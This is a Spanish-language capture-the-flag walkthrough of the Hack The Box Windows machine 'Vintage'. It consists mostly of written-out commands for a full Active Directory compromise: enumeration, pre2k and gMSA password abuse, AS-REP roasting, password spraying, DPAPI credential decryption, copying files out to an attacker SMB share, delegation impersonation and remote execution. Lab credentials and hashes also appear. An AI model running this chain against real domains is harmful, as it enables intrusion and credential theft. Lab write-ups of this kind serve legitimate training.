Vintage

Vintage


HTB Windows

nmap -A -p- -oA vintage 10.129.231.205 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA vintage 10.129.231.205

echo "10.129.231.205 DC01.vintage.htb vintage.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA vintage-udp 10.129.231.205

ping -c 1 10.129.231.205

ssh_command.

nmap -p- --open -T5 -v -n 10.129.231.205

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.231.205 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p53,389,445 10.129.231.205 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

Como suele ocurrir en las pruebas de pentest de Windows en la vida real, iniciará la máquina Vintage con las credenciales de la siguiente cuenta: P.Rosa:Rosaisbest123

rpcclient -U "P.Rosa%Rosaisbest123" 10.129.231.205 "enumdomusers"

ssh_command.

ldapdomaindump -u 'vintage.htb\P.Rosa' -p 'Rosaisbest123' -at SIMPLE -o ldd DC01.vintage.htb

ssh_command.

nxc ldap vintage.htb -k -u 'P.Rosa' -p 'Rosaisbest123' --query '(&(objectClass=computer))' 'samaccountname'

ssh_command.

smbclient -U 'vintage.htb/P.Rosa%Rosaisbest123' -L //10.129.231.205

ssh_command.

smbclient -U 'vintage.htb/P.Rosa%Rosaisbest123' --option="client min protocol=core" -L //10.129.231.205

ssh_command.

nxc smb 10.129.231.205

ssh_command.

nxc smb 10.129.231.205 -U P.Rosa -p 'Rosaisbest123'

nxc smb 10.129.231.205 -U P.Rosa -p 'Rosaisbest123' -k

ssh_command.

nxc smb 10.129.231.205 -U P.Rosa -p 'Rosaisbest123' -k --users

ssh_command.

nxc smb 10.129.231.205 -U P.Rosa -p 'Rosaisbest123' -k --users | sed 's/\x1b\[[0-9;]*m//g' | awk '{print $5}' > users.txt

ssh_command.

ssh_command.

bloodhound-python -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -c All -dc dc01.vintage.htb --dns-tcp -ns 10.129.231.205 --dns-timeout 10 --zip

ssh_command.

Instalamos pre2k

pipx install git+https://github.com/garrettfoster13/pre2k

ssh_command.

batcat computers.txt

ssh_command.

pre2k unauth -d vintage.htb -dc-ip 10.129.231.205 -inputfile computers.txt

ssh_command.

getTGT.py 'vintage.htb/fs01$':'fs01'

ssh_command.

export KRB5CCNAME=fs01\$.ccache

ssh_command.

KRB5CCNAME=FS01.ccache bloodyAD -k --host DC01.vintage.htb -d vintage.htb get object 'GMSA01$' --attr msDS-ManagedPassword

ssh_command.

impacket-getTGT -dc-ip 10.129.231.205 -hashes :3cc51fff9dfca7dc208252d1c570bb38 'vintage.htb/gMSA01$'@DC01.vintage.htb

ssh_command.

ssh_command.

bloodyAD -k \ —host dc01.vintage.htb \ -d VINTAGE.HTB \ add groupMember ‘SERVICEMANAGERS’ ‘GMSA01$’

ssh_command.

impacket-getTGT -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178 \ ‘vintage.htb/gmsa01$‘@dc01.vintage.htb

ssh_command.

ssh_command.

ssh_command.

Modificamos el targetedKerberoast.py en la linea 599-602

ssh_command.

KRB5CCNAME=gMSA01.ccache python3 targetedKerberoast/targetedKerberoast.py -k --no-pass -d vintage.htb --dc-host DC01.vintage.htb --dc-ip 10.129.121.191

No me funciono entonces

ssh_command.

bc /etc/krb5conf

ssh_command.

bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip $ip -k add uac SVC_SQL -f DONT_REQ_PREAUTH

bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip $ip -k remove uac SVC_SQL -f ACCOUNTDISABLE

ssh_command.

GetNPUsers.py vintage.htb/ -request -usersfile users.txt -format hashcat

ssh_command.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

ssh_command.

kerbrute passwordspray -d vintage.htb --dc $ip users.txt Zer0the0ne

ssh_command.

getTGT.py 'vintage.htb'/'C.Neri':'Zer0the0ne'

klist

evil-winrm -i dc01.vintage.htb -r vintage.htb

ssh_command.

type user.txt

ssh_command.

impacket-smbserver smbFolder $(pwd) -smbsupport -username cu3rv0x -password cu3rv0x

copy 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 \\10.10.15.98\smbFolder\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

ssh_command.

(Get-ADUser C.Neri).Sid.Value

ssh_command.

ls -force

ssh_command.

dpapi masterkey -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password 'Zer0the0ne' -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

ssh_command.

copy C4BB96844A5C9DD45D5B6A9859252BA6 \\10.10.15.98\smbFolder\C4BB96844A5C9DD45D5B6A9859252BA6

ssh_command.

dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

ssh_command.

getTGT.py vintage.htb/'C.Neri_adm:Uncr4ck4bl3P4ssW0rd0312'

klist

ssh_command.

getST.py -impersonate L.BIANCHI_ADM -spn host/dc01.vintage.htb 'vintage.htb/fs01$:fs01'

impacket-secretsdump -k -no-pass DC01.vintage.htb

No me funciono.

ssh_command.

wmiexec.py -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb

ssh_command.

© 2026 Cu3rv0x